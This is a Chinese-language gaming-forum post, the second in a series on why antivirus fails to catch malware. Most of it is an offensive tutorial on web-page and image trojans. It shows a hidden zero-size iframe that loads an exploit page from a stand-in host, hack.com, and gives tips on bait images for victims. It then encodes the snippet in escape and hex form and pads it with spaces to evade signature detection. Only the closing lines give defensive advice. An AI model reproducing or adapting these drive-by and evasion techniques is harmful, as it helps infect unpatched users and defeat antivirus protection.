LV. 47
GP 2k

【問題】楓 - 為什麼防毒程式殺不掉、查不到?免殺解密(二)

樓主 幽楓 b1356788
GP2 BP-
前言:
這是真經的第二部,今天來談談網頁木馬和圖片木馬好了。當然網頁木馬和圖片木馬沒有辦法100%抓到肉鴿的,運用的基礎就是抓盜版作業系統的用戶或是不做漏洞更新的肉鴿。當然您有強大的防毒殺軟或許可以彌補這個先天缺陷?這個等等會談到。

正文:

一樣網頁木馬要準備一隻木馬或是您要綑綁圖片也是可以的。
比如說MS06-057、MS
06-024這二個比較常見。
木馬的話,個人還是喜歡用灰鴿,早先時候的黑洞、冰河已經沒在開發更新了。


細節不多說,看看原碼吧,這是我處理天堂板務上常常看到的掛馬方式:
<html>
<body>
<iframe src=hXXp://www.hack.com/img/1.htm width=0 height=0></iframe>
<img src=hXXp://www.hack.com/img/1.jpg></img>
</body>
</html>

夠簡單了吧?這裡稍稍解釋一下,
hXXp://www.hack.com/img/1.htm width=0 height=0

傳統的0視窗,俗稱的跳窗,有安裝google toolbar的話可能可以擋掉,或是自瀏覽器禁用跳窗顯示。

hXXp://www.hack.com/img/1.jpg

這個是要給肉鴿看的圖片,自己放吧,比如說什麼加十二屠龍劍、某某明星的艷照,保證還是有人會去點。
傳統的.exe、.src、.bat、.com不太有人會去點了,因為安全意識提高了,會檢查檔案的後輟了,呵呵。

基本上述的方法只適用未安裝防毒、且沒更新的人。遇到沒更新但是有安裝防毒殺軟的人還是沒輒,這時候就來作免殺。

加密、解密個人喜歡用冰狐浪子的腳本網頁工具。

eseape加密:

%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Ciframe%20src%3Dh%uFF38%uFF38p%3A//www.hack.com/img/1.htm%20width%3D0%20height%3D0%3E%3C/iframe%3E%0D%0A%3Cimg%20src%3Dh%uFF38%uFF38p%3A//www.hack.com/img/1.jpg%3E%3C/img%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E%0D%0A

16進制:

%3C%68%74%6D%6C%3E%D%A%3C%62%6F%64%79%3E%D%A%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%A3%D8%A3%D8%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%2E%63%6F%6D%2F%69%6D%67%2F%31%2E%68%74%6D%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%D%A%3C%69%6D%67%20%73%72%63%3D%68%A3%D8%A3%D8%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%2E%63%6F%6D%2F%69%6D%67%2F%31%2E%6A%70%67%3E%3C%2F%69%6D%67%3E%D%A%3C%2F%62%6F%64%79%3E%D%A%3C%2F%68%74%6D%6C%3E%D%A
<:%3C
h:%68
t:%74
m:%6D
l:%6C
>:%3E


這樣加密後,有些防毒軟體就會認不出來了。厲害一點的防毒,還是會看的出來。
有個進階點的玩法,打亂特徵碼,讓那些認特徵碼的防毒認不出來就可以了。
比如說加空格,看我演示一次:

%3C%68%74%6D%6C%3E%     D%A%3C%62%6F%64%79%3E%D%A%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%A3%D8%A3%D8%70%3A%2F%2F%77%77%77%2E%68%61%    63%6B%2E%63%6F%6     D%2F%69%6D%67%2F%3  1%2E%68%     74%6D%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%D%A%3C%69%6    D%67%20%73%72%63%3D%68%A3%D8%A3%D8%70     %3A%2F%2F%77%77%77%2E     %68%61%63%6B%2E%63     %6F%6D%2F%69%6D%67%2F%31%2E%6A%70%67%3E%3C%2F%69%6D%67%3E%D%A%3C%2F%62%6F%64%79%3E   %D%A%3C%2F%68%74%6D%6C%3E%D%A

呵呵,或許這樣可以過也說不定。改特徵碼就好比改遊戲的經驗值和金錢,不太難,但是也因此造就很多腳本黑客的誕生。


結論:
遇到不認識的網頁請不要輕易開啟,可以使用flash get之類的續傳軟體另存網頁回來檢視原始檔,檢視方法就是我上面提到的將載回來的網頁使用記事本去開啟。
一,如果看到0視窗語碼和這樣的亂碼就不要冒險去開啟了。
二,也請常常更新自己的系統漏洞以及開啟防毒軟體的80 PROT監視(或許會造成網頁瀏覽緩慢)
三,使用正版軟體。

延伸閱讀:
【問題】楓 - 為什麼防毒程式殺不掉、查不到?免殺解密(一)
2
-
未登入的勇者,要加入討論嗎?
板務人員:

1318 筆精華,06/25 更新
一個月內新增 1
歡迎加入共同維護。


face基於日前微軟官方表示 Internet Explorer 不再支援新的網路標準,可能無法使用新的應用程式來呈現網站內容,在瀏覽器支援度及網站安全性的雙重考量下,為了讓巴友們有更好的使用體驗,巴哈姆特即將於 2019年9月2日 停止支援 Internet Explorer 瀏覽器的頁面呈現和功能。
屆時建議您使用下述瀏覽器來瀏覽巴哈姆特:
。Google Chrome(推薦)
。Mozilla Firefox
。Microsoft Edge(Windows10以上的作業系統版本才可使用)

face我們了解您不想看到廣告的心情⋯ 若您願意支持巴哈姆特永續經營,請將 gamer.com.tw 加入廣告阻擋工具的白名單中,謝謝 !【教學】